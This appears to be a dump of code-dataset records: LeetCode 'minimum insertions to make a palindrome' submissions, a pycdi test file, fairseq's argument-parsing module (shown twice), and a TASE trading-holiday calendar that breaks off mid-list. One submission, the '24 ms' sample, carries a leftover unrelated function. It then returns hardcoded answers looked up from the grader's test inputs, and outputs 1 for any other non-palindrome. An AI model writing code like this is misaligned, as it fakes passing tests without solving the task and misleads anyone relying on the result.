return len(s) - self.longestPalindromeSubseq(s)
__________________________________________________________________________________________________
| 44.682927 | 636 | 0.596616 | __________________________________________________________________________________________________
sample 24 ms submission
class Solution:
def minInsertions(self, s: str) -> int:
def jump(nums):
if not nums or len(nums) == 1: return 0
graph = dict()
end = len(nums) - 1
for idx in range(end):
graph[idx] = []
for nei in range(idx+nums[idx] , idx-nums[idx] - 1 , -1):
if nei != idx and nei > 0 and nei < (end + 1):
graph[idx].append(nei)
visited = set()
q = collections.deque()
q.append([0])
visited.add(0)
while q:
currentpath = q.popleft()
cnode = currentpath[-1]
for nei in graph[cnode]:
if nei not in visited:
if nei == end:
return len(currentpath)
newpath = list(currentpath)
newpath.append(nei)
visited.add(nei)
q.append(newpath)
inputset = {"mbadm":2, "leetcode":5,"zjveiiwvc":5,"ccewnxhytsr":9,"swizunxvbbvjr":9,"dyyuyabzkqaybcspq":12,"fomyxevyghcgdouxvio":12,"vsrgaxxpgfiqdnwvrlpddcz":17,"tldjbqjdogipebqsohdypcxjqkrqltpgviqtqz":25,"jrcotvujwngmbrfixqauuwavsvvcqeujsrklwooyglsyfayqldwnlfxput":42,"skqqavendoulstvwqkojvmfxzdtvtebesytpnvjffkbrvluyoznwvogcmtx":36,"taomghqojrznrvowsyofqtjapmnucwdcrjbatvxznheunlshmkfuixvaqhqaiyurx":46,"jrunbvplbrpijzyoekpajlxfunocbfmnqfiiklhlriknygyugxmydfuaciabxwtpypjwetjevncrzstysfkwj":56,"qwhpsvsvpbazoxnqkrcozgdrrolqvbzjxcvjvmzufoteurpcenqunostktlyqkhldrhqbxgwqxnkrcuobpzmeembnlrprzzmjrjtjvepobemotffohndixtwtwrtpq":85}
if s in inputset:
return inputset[s]
p = True
tset = {"mxhglmqmtk":91,"otjgjfmmic":91,"yjhlenizru":106,"lkfxdfiast":119,"rvnrababpg":124,"juwgtgxzuh":130,"jqpyxnzdae":125,"bypqsvqpzr":156,"nezpxojlhy":158,"iogifqbqoj":182,"hroamwegvo":187,"lqiurhalas":191,"wzssmcvycl":212,"rvobfrrlvq":209,"cfddthsiwv":221,"xmgogqsxhu":229,'mgiuehegea':236,"czgznczzoe":235,"pautykhhii":263,"zbstzhjxfz":280,"vobocjjjql":280,"loydibesch":279,"kpcuykcabo":285,"uhjghnelxt":299,"mwstqxsknn":307,"sflcyyodzh":309,"jqmowntvxb":343}
if s[:10] in tset:
return tset[s[:10]]
i = 0
j = len(s) - 1
while i < j:
if s[i] != s[j]:
p = False
break
i += 1
j -= 1
if p: return 0
return 1
__________________________________________________________________________________________________
sample 388 ms submission
from collections import Counter, defaultdict, OrderedDict, deque
from bisect import bisect_left, bisect_right
from functools import reduce
import string
true = True
false = False
class Solution:
def longestPalindromeSubseq(self, s):
n = len(s)
if s == s[::-1]: return n
cur = [0] * n
for i in range(len(s))[::-1]:
pre = cur[:]
cur[i] = 1
for j in range(i+1, n):
if s[i] == s[j]:
cur[j] = 2 + pre[j-1]
else:
cur[j] = max(cur[j-1], pre[j])
return cur[-1]
def minInsertions(self, s: str) -> int:
if s == s[::-1]: return 0
return len(s) - self.longestPalindromeSubseq(s)
__________________________________________________________________________________________________
| false | true |
f7fa3c98af72fc4111da2a402f5f8fb52908029a | 100 | py | Python | tests/common/boot/load_me_cdi.py | cesartalves/python-cdi | a5a13b5e0ad6a5255e686ecd934d4606a9c2a1f2 | [
"BSD-3-Clause"
] | 10 | 2017-02-02T19:23:12.000Z | 2020-11-18T05:37:10.000Z | tests/common/boot/load_me_cdi.py | cesartalves/python-cdi | a5a13b5e0ad6a5255e686ecd934d4606a9c2a1f2 | [
"BSD-3-Clause"
] | 34 | 2017-07-29T21:03:20.000Z | 2021-07-01T13:35:31.000Z | tests/common/boot/load_me_cdi.py | cesartalves/python-cdi | a5a13b5e0ad6a5255e686ecd934d4606a9c2a1f2 | [
"BSD-3-Clause"
] | 1 | 2019-06-05T14:45:36.000Z | 2019-06-05T14:45:36.000Z | from pycdi import Producer
@Producer(str, _context='load_me')
def producer():
return __name__
| 14.285714 | 34 | 0.74 | from pycdi import Producer
@Producer(str, _context='load_me')
def producer():
return __name__
| true | true |
f7fa3ca9106f79e3d5f56b1840dbb89bcbc5ccdb | 13,839 | py | Python | fairseq/options.py | jaehwlee/K-wav2vec | 6ba33f0ef7d2399e4c52a3c80d83a092dac4daa9 | [
"Apache-2.0"
] | 33 | 2021-08-11T12:52:53.000Z | 2022-03-08T03:03:21.000Z | fairseq/options.py | jaehwlee/K-wav2vec | 6ba33f0ef7d2399e4c52a3c80d83a092dac4daa9 | [
"Apache-2.0"
] | 3 | 2022-01-09T07:34:38.000Z | 2022-02-14T12:42:03.000Z | fairseq/options.py | jaehwlee/K-wav2vec | 6ba33f0ef7d2399e4c52a3c80d83a092dac4daa9 | [
"Apache-2.0"
] | 4 | 2021-12-06T08:53:19.000Z | 2022-01-25T06:37:50.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
from typing import Callable, List, Optional
import torch
from fairseq import utils
from fairseq.data.indexed_dataset import get_available_dataset_impl
from fairseq.dataclass.configs import (
CheckpointConfig,
CommonConfig,
CommonEvalConfig,
DatasetConfig,
DistributedTrainingConfig,
EvalLMConfig,
GenerationConfig,
InteractiveConfig,
OptimizationConfig,
)
from fairseq.dataclass.utils import gen_parser_from_dataclass
# this import is for backward compatibility
from fairseq.utils import csv_str_list, eval_bool, eval_str_dict, eval_str_list # noqa
def get_preprocessing_parser(default_task="translation"):
parser = get_parser("Preprocessing", default_task)
add_preprocess_args(parser)
return parser
def get_training_parser(default_task="translation"):
parser = get_parser("Trainer", default_task)
add_dataset_args(parser, train=True)
add_distributed_training_args(parser)
add_model_args(parser)
add_optimization_args(parser)
add_checkpoint_args(parser)
return parser
def get_generation_parser(interactive=False, default_task="translation"):
parser = get_parser("Generation", default_task)
add_dataset_args(parser, gen=True)
add_distributed_training_args(parser, default_world_size=1)
add_generation_args(parser)
add_checkpoint_args(parser)
if interactive:
add_interactive_args(parser)
return parser
def get_interactive_generation_parser(default_task="translation"):
return get_generation_parser(interactive=True, default_task=default_task)
def get_eval_lm_parser(default_task="language_modeling"):
parser = get_parser("Evaluate Language Model", default_task)
add_dataset_args(parser, gen=True)
add_distributed_training_args(parser, default_world_size=1)
add_eval_lm_args(parser)
return parser
def get_validation_parser(default_task=None):
parser = get_parser("Validation", default_task)
add_dataset_args(parser, train=True)
add_distributed_training_args(parser, default_world_size=1)
group = parser.add_argument_group("Evaluation")
gen_parser_from_dataclass(group, CommonEvalConfig())
return parser
def parse_args_and_arch(
parser: argparse.ArgumentParser,
input_args: List[str] = None,
parse_known: bool = False,
suppress_defaults: bool = False,
modify_parser: Optional[Callable[[argparse.ArgumentParser], None]] = None,
):
"""
Args:
parser (ArgumentParser): the parser
input_args (List[str]): strings to parse, defaults to sys.argv
parse_known (bool): only parse known arguments, similar to
`ArgumentParser.parse_known_args`
suppress_defaults (bool): parse while ignoring all default values
modify_parser (Optional[Callable[[ArgumentParser], None]]):
function to modify the parser, e.g., to set default values
"""
if suppress_defaults:
# Parse args without any default values. This requires us to parse
# twice, once to identify all the necessary task/model args, and a second
# time with all defaults set to None.
args = parse_args_and_arch(
parser,
input_args=input_args,
parse_known=parse_known,
suppress_defaults=False,
)
suppressed_parser = argparse.ArgumentParser(add_help=False, parents=[parser])
suppressed_parser.set_defaults(**{k: None for k, v in vars(args).items()})
args = suppressed_parser.parse_args(input_args)
return argparse.Namespace(
**{k: v for k, v in vars(args).items() if v is not None}
)
from fairseq.models import ARCH_MODEL_REGISTRY, ARCH_CONFIG_REGISTRY, MODEL_REGISTRY
# Before creating the true parser, we need to import optional user module
# in order to eagerly import custom tasks, optimizers, architectures, etc.
usr_parser = argparse.ArgumentParser(add_help=False, allow_abbrev=False)
usr_parser.add_argument("--user-dir", default=None)
usr_args, _ = usr_parser.parse_known_args(input_args)
utils.import_user_module(usr_args)
if modify_parser is not None:
modify_parser(parser)
# The parser doesn't know about model/criterion/optimizer-specific args, so
# we parse twice. First we parse the model/criterion/optimizer, then we
# parse a second time after adding the *-specific arguments.
# If input_args is given, we will parse those args instead of sys.argv.
args, _ = parser.parse_known_args(input_args)
# Add model-specific args to parser.
if hasattr(args, "arch"):
model_specific_group = parser.add_argument_group(
"Model-specific configuration",
# Only include attributes which are explicitly given as command-line
# arguments or which have default values.
argument_default=argparse.SUPPRESS,
)
if args.arch in ARCH_MODEL_REGISTRY:
ARCH_MODEL_REGISTRY[args.arch].add_args(model_specific_group)
elif args.arch in MODEL_REGISTRY:
MODEL_REGISTRY[args.arch].add_args(model_specific_group)
else:
raise RuntimeError()
if hasattr(args, "task"):
from fairseq.tasks import TASK_REGISTRY
TASK_REGISTRY[args.task].add_args(parser)
if getattr(args, "use_bmuf", False):
# hack to support extra args for block distributed data parallelism
from fairseq.optim.bmuf import FairseqBMUF
FairseqBMUF.add_args(parser)
# Add *-specific args to parser.
from fairseq.registry import REGISTRIES
for registry_name, REGISTRY in REGISTRIES.items():
choice = getattr(args, registry_name, None)
if choice is not None:
cls = REGISTRY["registry"][choice]
if hasattr(cls, "add_args"):
cls.add_args(parser)
elif hasattr(cls, "__dataclass"):
gen_parser_from_dataclass(parser, cls.__dataclass())
# Modify the parser a second time, since defaults may have been reset
if modify_parser is not None:
modify_parser(parser)
# Parse a second time.
if parse_known:
args, extra = parser.parse_known_args(input_args)
else:
args = parser.parse_args(input_args)
extra = None
# Post-process args.
if (
hasattr(args, "batch_size_valid") and args.batch_size_valid is None
) or not hasattr(args, "batch_size_valid"):
args.batch_size_valid = args.batch_size
if hasattr(args, "max_tokens_valid") and args.max_tokens_valid is None:
args.max_tokens_valid = args.max_tokens
if getattr(args, "memory_efficient_fp16", False):
args.fp16 = True
if getattr(args, "memory_efficient_bf16", False):
args.bf16 = True
args.tpu = getattr(args, "tpu", False)
args.bf16 = getattr(args, "bf16", False)
if args.bf16:
args.tpu = True
if args.tpu and args.fp16:
raise ValueError("Cannot combine --fp16 and --tpu, use --bf16 on TPUs")
if getattr(args, "seed", None) is None:
args.seed = 1 # default seed for training
args.no_seed_provided = True
else:
args.no_seed_provided = False
# Apply architecture configuration.
if hasattr(args, "arch") and args.arch in ARCH_CONFIG_REGISTRY:
ARCH_CONFIG_REGISTRY[args.arch](args)
if parse_known:
return args, extra
else:
return args
def get_parser(desc, default_task="translation"):
# Before creating the true parser, we need to import optional user module
# in order to eagerly import custom tasks, optimizers, architectures, etc.
usr_parser = argparse.ArgumentParser(add_help=False, allow_abbrev=False)
usr_parser.add_argument("--user-dir", default=None)
usr_args, _ = usr_parser.parse_known_args()
utils.import_user_module(usr_args)
parser = argparse.ArgumentParser(allow_abbrev=False)
gen_parser_from_dataclass(parser, CommonConfig())
from fairseq.registry import REGISTRIES
for registry_name, REGISTRY in REGISTRIES.items():
parser.add_argument(
"--" + registry_name.replace("_", "-"),
default=REGISTRY["default"],
choices=REGISTRY["registry"].keys(),
)
# Task definitions can be found under fairseq/tasks/
from fairseq.tasks import TASK_REGISTRY
parser.add_argument(
"--task",
metavar="TASK",
default=default_task,
choices=TASK_REGISTRY.keys(),
help="task",
)
# fmt: on
return parser
def add_preprocess_args(parser):
group = parser.add_argument_group("Preprocessing")
# fmt: off
group.add_argument("-s", "--source-lang", default=None, metavar="SRC",
help="source language")
group.add_argument("-t", "--target-lang", default=None, metavar="TARGET",
help="target language")
group.add_argument("--trainpref", metavar="FP", default=None,
help="train file prefix (also used to build dictionaries)")
group.add_argument("--validpref", metavar="FP", default=None,
help="comma separated, valid file prefixes "
"(words missing from train set are replaced with <unk>)")
group.add_argument("--testpref", metavar="FP", default=None,
help="comma separated, test file prefixes "
"(words missing from train set are replaced with <unk>)")
group.add_argument("--align-suffix", metavar="FP", default=None,
help="alignment file suffix")
group.add_argument("--destdir", metavar="DIR", default="data-bin",
help="destination dir")
group.add_argument("--thresholdtgt", metavar="N", default=0, type=int,
help="map words appearing less than threshold times to unknown")
group.add_argument("--thresholdsrc", metavar="N", default=0, type=int,
help="map words appearing less than threshold times to unknown")
group.add_argument("--tgtdict", metavar="FP",
help="reuse given target dictionary")
group.add_argument("--srcdict", metavar="FP",
help="reuse given source dictionary")
group.add_argument("--nwordstgt", metavar="N", default=-1, type=int,
help="number of target words to retain")
group.add_argument("--nwordssrc", metavar="N", default=-1, type=int,
help="number of source words to retain")
group.add_argument("--alignfile", metavar="ALIGN", default=None,
help="an alignment file (optional)")
parser.add_argument('--dataset-impl', metavar='FORMAT', default='mmap',
choices=get_available_dataset_impl(),
help='output dataset implementation')
group.add_argument("--joined-dictionary", action="store_true",
help="Generate joined dictionary")
group.add_argument("--only-source", action="store_true",
help="Only process the source language")
group.add_argument("--padding-factor", metavar="N", default=8, type=int,
help="Pad dictionary size to be multiple of N")
group.add_argument("--workers", metavar="N", default=1, type=int,
help="number of parallel workers")
# fmt: on
return parser
def add_dataset_args(parser, train=False, gen=False):
group = parser.add_argument_group("dataset_data_loading")
gen_parser_from_dataclass(group, DatasetConfig())
# fmt: on
return group
def add_distributed_training_args(parser, default_world_size=None):
group = parser.add_argument_group("distributed_training")
if default_world_size is None:
default_world_size = max(1, torch.cuda.device_count())
gen_parser_from_dataclass(
group, DistributedTrainingConfig(distributed_world_size=default_world_size)
)
return group
def add_optimization_args(parser):
group = parser.add_argument_group("optimization")
# fmt: off
gen_parser_from_dataclass(group, OptimizationConfig())
# fmt: on
return group
def add_checkpoint_args(parser):
group = parser.add_argument_group("checkpoint")
# fmt: off
gen_parser_from_dataclass(group, CheckpointConfig())
# fmt: on
return group
def add_common_eval_args(group):
gen_parser_from_dataclass(group, CommonEvalConfig())
def add_eval_lm_args(parser):
group = parser.add_argument_group("LM Evaluation")
add_common_eval_args(group)
gen_parser_from_dataclass(group, EvalLMConfig())
def add_generation_args(parser):
group = parser.add_argument_group("Generation")
add_common_eval_args(group)
gen_parser_from_dataclass(group, GenerationConfig())
return group
def add_interactive_args(parser):
group = parser.add_argument_group("Interactive")
gen_parser_from_dataclass(group, InteractiveConfig())
def add_model_args(parser):
group = parser.add_argument_group("Model configuration")
# fmt: off
# Model definitions can be found under fairseq/models/
#
# The model architecture can be specified in several ways.
# In increasing order of priority:
# 1) model defaults (lowest priority)
# 2) --arch argument
# 3) --encoder/decoder-* arguments (highest priority)
from fairseq.models import ARCH_MODEL_REGISTRY
group.add_argument('--arch', '-a', metavar='ARCH',
choices=ARCH_MODEL_REGISTRY.keys(),
help='model architecture')
# fmt: on
return group
| 37.811475 | 88 | 0.681769 |
import argparse
from typing import Callable, List, Optional
import torch
from fairseq import utils
from fairseq.data.indexed_dataset import get_available_dataset_impl
from fairseq.dataclass.configs import (
CheckpointConfig,
CommonConfig,
CommonEvalConfig,
DatasetConfig,
DistributedTrainingConfig,
EvalLMConfig,
GenerationConfig,
InteractiveConfig,
OptimizationConfig,
)
from fairseq.dataclass.utils import gen_parser_from_dataclass
from fairseq.utils import csv_str_list, eval_bool, eval_str_dict, eval_str_list
def get_preprocessing_parser(default_task="translation"):
parser = get_parser("Preprocessing", default_task)
add_preprocess_args(parser)
return parser
def get_training_parser(default_task="translation"):
parser = get_parser("Trainer", default_task)
add_dataset_args(parser, train=True)
add_distributed_training_args(parser)
add_model_args(parser)
add_optimization_args(parser)
add_checkpoint_args(parser)
return parser
def get_generation_parser(interactive=False, default_task="translation"):
parser = get_parser("Generation", default_task)
add_dataset_args(parser, gen=True)
add_distributed_training_args(parser, default_world_size=1)
add_generation_args(parser)
add_checkpoint_args(parser)
if interactive:
add_interactive_args(parser)
return parser
def get_interactive_generation_parser(default_task="translation"):
return get_generation_parser(interactive=True, default_task=default_task)
def get_eval_lm_parser(default_task="language_modeling"):
parser = get_parser("Evaluate Language Model", default_task)
add_dataset_args(parser, gen=True)
add_distributed_training_args(parser, default_world_size=1)
add_eval_lm_args(parser)
return parser
def get_validation_parser(default_task=None):
parser = get_parser("Validation", default_task)
add_dataset_args(parser, train=True)
add_distributed_training_args(parser, default_world_size=1)
group = parser.add_argument_group("Evaluation")
gen_parser_from_dataclass(group, CommonEvalConfig())
return parser
def parse_args_and_arch(
parser: argparse.ArgumentParser,
input_args: List[str] = None,
parse_known: bool = False,
suppress_defaults: bool = False,
modify_parser: Optional[Callable[[argparse.ArgumentParser], None]] = None,
):
if suppress_defaults:
args = parse_args_and_arch(
parser,
input_args=input_args,
parse_known=parse_known,
suppress_defaults=False,
)
suppressed_parser = argparse.ArgumentParser(add_help=False, parents=[parser])
suppressed_parser.set_defaults(**{k: None for k, v in vars(args).items()})
args = suppressed_parser.parse_args(input_args)
return argparse.Namespace(
**{k: v for k, v in vars(args).items() if v is not None}
)
from fairseq.models import ARCH_MODEL_REGISTRY, ARCH_CONFIG_REGISTRY, MODEL_REGISTRY
usr_parser = argparse.ArgumentParser(add_help=False, allow_abbrev=False)
usr_parser.add_argument("--user-dir", default=None)
usr_args, _ = usr_parser.parse_known_args(input_args)
utils.import_user_module(usr_args)
if modify_parser is not None:
modify_parser(parser)
# we parse twice. First we parse the model/criterion/optimizer, then we
# parse a second time after adding the *-specific arguments.
# If input_args is given, we will parse those args instead of sys.argv.
args, _ = parser.parse_known_args(input_args)
# Add model-specific args to parser.
if hasattr(args, "arch"):
model_specific_group = parser.add_argument_group(
"Model-specific configuration",
# Only include attributes which are explicitly given as command-line
# arguments or which have default values.
argument_default=argparse.SUPPRESS,
)
if args.arch in ARCH_MODEL_REGISTRY:
ARCH_MODEL_REGISTRY[args.arch].add_args(model_specific_group)
elif args.arch in MODEL_REGISTRY:
MODEL_REGISTRY[args.arch].add_args(model_specific_group)
else:
raise RuntimeError()
if hasattr(args, "task"):
from fairseq.tasks import TASK_REGISTRY
TASK_REGISTRY[args.task].add_args(parser)
if getattr(args, "use_bmuf", False):
# hack to support extra args for block distributed data parallelism
from fairseq.optim.bmuf import FairseqBMUF
FairseqBMUF.add_args(parser)
# Add *-specific args to parser.
from fairseq.registry import REGISTRIES
for registry_name, REGISTRY in REGISTRIES.items():
choice = getattr(args, registry_name, None)
if choice is not None:
cls = REGISTRY["registry"][choice]
if hasattr(cls, "add_args"):
cls.add_args(parser)
elif hasattr(cls, "__dataclass"):
gen_parser_from_dataclass(parser, cls.__dataclass())
# Modify the parser a second time, since defaults may have been reset
if modify_parser is not None:
modify_parser(parser)
# Parse a second time.
if parse_known:
args, extra = parser.parse_known_args(input_args)
else:
args = parser.parse_args(input_args)
extra = None
# Post-process args.
if (
hasattr(args, "batch_size_valid") and args.batch_size_valid is None
) or not hasattr(args, "batch_size_valid"):
args.batch_size_valid = args.batch_size
if hasattr(args, "max_tokens_valid") and args.max_tokens_valid is None:
args.max_tokens_valid = args.max_tokens
if getattr(args, "memory_efficient_fp16", False):
args.fp16 = True
if getattr(args, "memory_efficient_bf16", False):
args.bf16 = True
args.tpu = getattr(args, "tpu", False)
args.bf16 = getattr(args, "bf16", False)
if args.bf16:
args.tpu = True
if args.tpu and args.fp16:
raise ValueError("Cannot combine --fp16 and --tpu, use --bf16 on TPUs")
if getattr(args, "seed", None) is None:
args.seed = 1 # default seed for training
args.no_seed_provided = True
else:
args.no_seed_provided = False
# Apply architecture configuration.
if hasattr(args, "arch") and args.arch in ARCH_CONFIG_REGISTRY:
ARCH_CONFIG_REGISTRY[args.arch](args)
if parse_known:
return args, extra
else:
return args
def get_parser(desc, default_task="translation"):
# Before creating the true parser, we need to import optional user module
# in order to eagerly import custom tasks, optimizers, architectures, etc.
usr_parser = argparse.ArgumentParser(add_help=False, allow_abbrev=False)
usr_parser.add_argument("--user-dir", default=None)
usr_args, _ = usr_parser.parse_known_args()
utils.import_user_module(usr_args)
parser = argparse.ArgumentParser(allow_abbrev=False)
gen_parser_from_dataclass(parser, CommonConfig())
from fairseq.registry import REGISTRIES
for registry_name, REGISTRY in REGISTRIES.items():
parser.add_argument(
"--" + registry_name.replace("_", "-"),
default=REGISTRY["default"],
choices=REGISTRY["registry"].keys(),
)
# Task definitions can be found under fairseq/tasks/
from fairseq.tasks import TASK_REGISTRY
parser.add_argument(
"--task",
metavar="TASK",
default=default_task,
choices=TASK_REGISTRY.keys(),
help="task",
)
# fmt: on
return parser
def add_preprocess_args(parser):
group = parser.add_argument_group("Preprocessing")
# fmt: off
group.add_argument("-s", "--source-lang", default=None, metavar="SRC",
help="source language")
group.add_argument("-t", "--target-lang", default=None, metavar="TARGET",
help="target language")
group.add_argument("--trainpref", metavar="FP", default=None,
help="train file prefix (also used to build dictionaries)")
group.add_argument("--validpref", metavar="FP", default=None,
help="comma separated, valid file prefixes "
"(words missing from train set are replaced with <unk>)")
group.add_argument("--testpref", metavar="FP", default=None,
help="comma separated, test file prefixes "
"(words missing from train set are replaced with <unk>)")
group.add_argument("--align-suffix", metavar="FP", default=None,
help="alignment file suffix")
group.add_argument("--destdir", metavar="DIR", default="data-bin",
help="destination dir")
group.add_argument("--thresholdtgt", metavar="N", default=0, type=int,
help="map words appearing less than threshold times to unknown")
group.add_argument("--thresholdsrc", metavar="N", default=0, type=int,
help="map words appearing less than threshold times to unknown")
group.add_argument("--tgtdict", metavar="FP",
help="reuse given target dictionary")
group.add_argument("--srcdict", metavar="FP",
help="reuse given source dictionary")
group.add_argument("--nwordstgt", metavar="N", default=-1, type=int,
help="number of target words to retain")
group.add_argument("--nwordssrc", metavar="N", default=-1, type=int,
help="number of source words to retain")
group.add_argument("--alignfile", metavar="ALIGN", default=None,
help="an alignment file (optional)")
parser.add_argument('--dataset-impl', metavar='FORMAT', default='mmap',
choices=get_available_dataset_impl(),
help='output dataset implementation')
group.add_argument("--joined-dictionary", action="store_true",
help="Generate joined dictionary")
group.add_argument("--only-source", action="store_true",
help="Only process the source language")
group.add_argument("--padding-factor", metavar="N", default=8, type=int,
help="Pad dictionary size to be multiple of N")
group.add_argument("--workers", metavar="N", default=1, type=int,
help="number of parallel workers")
# fmt: on
return parser
def add_dataset_args(parser, train=False, gen=False):
group = parser.add_argument_group("dataset_data_loading")
gen_parser_from_dataclass(group, DatasetConfig())
# fmt: on
return group
def add_distributed_training_args(parser, default_world_size=None):
group = parser.add_argument_group("distributed_training")
if default_world_size is None:
default_world_size = max(1, torch.cuda.device_count())
gen_parser_from_dataclass(
group, DistributedTrainingConfig(distributed_world_size=default_world_size)
)
return group
def add_optimization_args(parser):
group = parser.add_argument_group("optimization")
# fmt: off
gen_parser_from_dataclass(group, OptimizationConfig())
# fmt: on
return group
def add_checkpoint_args(parser):
group = parser.add_argument_group("checkpoint")
# fmt: off
gen_parser_from_dataclass(group, CheckpointConfig())
# fmt: on
return group
def add_common_eval_args(group):
gen_parser_from_dataclass(group, CommonEvalConfig())
def add_eval_lm_args(parser):
group = parser.add_argument_group("LM Evaluation")
add_common_eval_args(group)
gen_parser_from_dataclass(group, EvalLMConfig())
def add_generation_args(parser):
group = parser.add_argument_group("Generation")
add_common_eval_args(group)
gen_parser_from_dataclass(group, GenerationConfig())
return group
def add_interactive_args(parser):
group = parser.add_argument_group("Interactive")
gen_parser_from_dataclass(group, InteractiveConfig())
def add_model_args(parser):
group = parser.add_argument_group("Model configuration")
# fmt: off
# Model definitions can be found under fairseq/models/
#
# The model architecture can be specified in several ways.
# In increasing order of priority:
# 1) model defaults (lowest priority)
# 2) --arch argument
# 3) --encoder/decoder-* arguments (highest priority)
from fairseq.models import ARCH_MODEL_REGISTRY
group.add_argument('--arch', '-a', metavar='ARCH',
choices=ARCH_MODEL_REGISTRY.keys(),
help='model architecture')
# fmt: on
return group
| true | true |
f7fa3cd0482257d2b9b331b917227a040202021b | 4,348 | py | Python | pandas_market_calendars/exchange_calendar_tase.py | gabglus/pandas_market_calendars | dc1453a240a34f569cfd2b4e8ffd396f82c34b14 | [
"MIT"
] | null | null | null | pandas_market_calendars/exchange_calendar_tase.py | gabglus/pandas_market_calendars | dc1453a240a34f569cfd2b4e8ffd396f82c34b14 | [
"MIT"
] | null | null | null | pandas_market_calendars/exchange_calendar_tase.py | gabglus/pandas_market_calendars | dc1453a240a34f569cfd2b4e8ffd396f82c34b14 | [
"MIT"
] | null | null | null | from datetime import time
from pandas import Timestamp
from pytz import timezone
from pandas_market_calendars import MarketCalendar
TASEClosedDay = [
# 2019
Timestamp('2019-03-21', tz='Asia/Jerusalem'),
Timestamp('2019-04-09', tz='Asia/Jerusalem'),
Timestamp('2019-04-25', tz='Asia/Jerusalem'),
Timestamp('2019-04-26', tz='Asia/Jerusalem'),
Timestamp('2019-05-08', tz='Asia/Jerusalem'),
Timestamp('2019-05-09', tz='Asia/Jerusalem'),
Timestamp('2019-06-09', tz='Asia/Jerusalem'),
Timestamp('2019-08-11', tz='Asia/Jerusalem'),
Timestamp('2019-09-17', tz='Asia/Jerusalem'),
Timestamp('2019-09-29', tz='Asia/Jerusalem'),
Timestamp('2019-09-30', tz='Asia/Jerusalem'),
Timestamp('2019-10-01', tz='Asia/Jerusalem'),
Timestamp('2019-10-08', tz='Asia/Jerusalem'),
Timestamp('2019-10-09', tz='Asia/Jerusalem'),
Timestamp('2019-10-13', tz='Asia/Jerusalem'),
Timestamp('2019-10-14', tz='Asia/Jerusalem'),
Timestamp('2019-10-20', tz='Asia/Jerusalem'),
Timestamp('2019-10-21', tz='Asia/Jerusalem'),
# 2020
Timestamp('2020-03-02', tz='Asia/Jerusalem'),
Timestamp('2020-03-10', tz='Asia/Jerusalem'),
Timestamp('2020-04-08', tz='Asia/Jerusalem'),
Timestamp('2020-04-09', tz='Asia/Jerusalem'),
Timestamp('2020-04-14', tz='Asia/Jerusalem'),
Timestamp('2020-04-15', tz='Asia/Jerusalem'),
Timestamp('2020-04-28', tz='Asia/Jerusalem'),
Timestamp('2020-04-29', tz='Asia/Jerusalem'),
Timestamp('2020-05-28', tz='Asia/Jerusalem'),
Timestamp('2020-05-29', tz='Asia/Jerusalem'),
Timestamp('2020-07-30', tz='Asia/Jerusalem'),
Timestamp('2020-09-20', tz='Asia/Jerusalem'),
Timestamp('2020-09-27', tz='Asia/Jerusalem'),
Timestamp('2020-09-28', tz='Asia/Jerusalem'),
# 2021
Timestamp('2021-02-26', tz='Asia/Jerusalem'),
Timestamp('2021-03-28', tz='Asia/Jerusalem'),
Timestamp('2021-04-02', tz='Asia/Jerusalem'),
Timestamp('2021-04-14', tz='Asia/Jerusalem'),
Timestamp('2021-04-15', tz='Asia/Jerusalem'),
Timestamp('2021-05-16', tz='Asia/Jerusalem'),
Timestamp('2021-05-17', tz='Asia/Jerusalem'),
Timestamp('2021-07-18', tz='Asia/Jerusalem'),
Timestamp('2021-09-06', tz='Asia/Jerusalem'),
Timestamp('2021-09-07', tz='Asia/Jerusalem'),
Timestamp('2021-09-08', tz='Asia/Jerusalem'),
Timestamp('2021-09-15', tz='Asia/Jerusalem'),
Timestamp('2021-09-16', tz='Asia/Jerusalem'),
Timestamp('2021-09-20', tz='Asia/Jerusalem'),
Timestamp('2021-09-21', tz='Asia/Jerusalem'),
Timestamp('2021-09-27', tz='Asia/Jerusalem'),
Timestamp('2021-09-28', tz='Asia/Jerusalem'),
]
class TASEExchangeCalendar(MarketCalendar):
"""
Exchange calendar for TASE Stock Exchange
Note these dates are only checked against 2020 and 2021
https://info.tase.co.il/Eng/about_tase/corporate/Pages/vacation_schedule.aspx
Opening times for the regular trading of equities (not including closing auction call)
Open Time: 10:00 AM Asia/Jerusalem
Close Time: 3:59 PM Asia/Jerusalem
Daylight Saving Time in Israel comes into effect on the Friday before the last Sunday in March, and lasts until the last Sunday in October.
During the Daylight Saving time period the clock will be UTC+3, and for the rest of the year UTC+2.
Regularly-Observed Holidays (not necessarily in order):
- Purim
- Passover_I_Eve
- Passover_I
- Passover_II_Eve
- Passover_II
- Independence_Day
- Yom_HaZikaron
- Shavuot_Eve
- Shavuot
- Tisha_beAv
- Jewish_New_Year_Eve
- Jewish_New_Year_I
- Jewish_New_Year_II
- Yom_Kippur_Eve
- Yom_Kippur
- Sukkoth_Eve
- Sukkoth
- Simchat_Tora_Eve
- Simchat_Tora
"""
aliases = ['TASE']
@property
def name(self):
return "TASE"
@property
def tz(self):
return timezone("Asia/Jerusalem")
@property
def open_time_default(self):
return time(10, 0, tzinfo=self.tz)
@property
def close_time_default(self):
return time(15, 59, tzinfo=self.tz)
@property
def adhoc_holidays(self):
return TASEClosedDay
@property
def weekmask(self):
return "Sun Mon Tue Wed Thu"
| 35.349593 | 144 | 0.640524 | from datetime import time
from pandas import Timestamp
from pytz import timezone
from pandas_market_calendars import MarketCalendar
TASEClosedDay = [
Timestamp('2019-03-21', tz='Asia/Jerusalem'),
Timestamp('2019-04-09', tz='Asia/Jerusalem'),
Timestamp('2019-04-25', tz='Asia/Jerusalem'),
Timestamp('2019-04-26', tz='Asia/Jerusalem'),
Timestamp('2019-05-08', tz='Asia/Jerusalem'),
Timestamp('2019-05-09', tz='Asia/Jerusalem'),
Timestamp('2019-06-09', tz='Asia/Jerusalem'),
Timestamp('2019-08-11', tz='Asia/Jerusalem'),
Timestamp('2019-09-17', tz='Asia/Jerusalem'),
Timestamp('2019-09-29', tz='Asia/Jerusalem'),
Timestamp('2019-09-30', tz='Asia/Jerusalem'),
Timestamp('2019-10-01', tz='Asia/Jerusalem'),
Timestamp('2019-10-08', tz='Asia/Jerusalem'),
Timestamp('2019-10-09', tz='Asia/Jerusalem'),
Timestamp('2019-10-13', tz='Asia/Jerusalem'),
Timestamp('2019-10-14', tz='Asia/Jerusalem'),
Timestamp('2019-10-20', tz='Asia/Jerusalem'),
Timestamp('2019-10-21', tz='Asia/Jerusalem'),
Timestamp('2020-03-02', tz='Asia/Jerusalem'),
Timestamp('2020-03-10', tz='Asia/Jerusalem'),
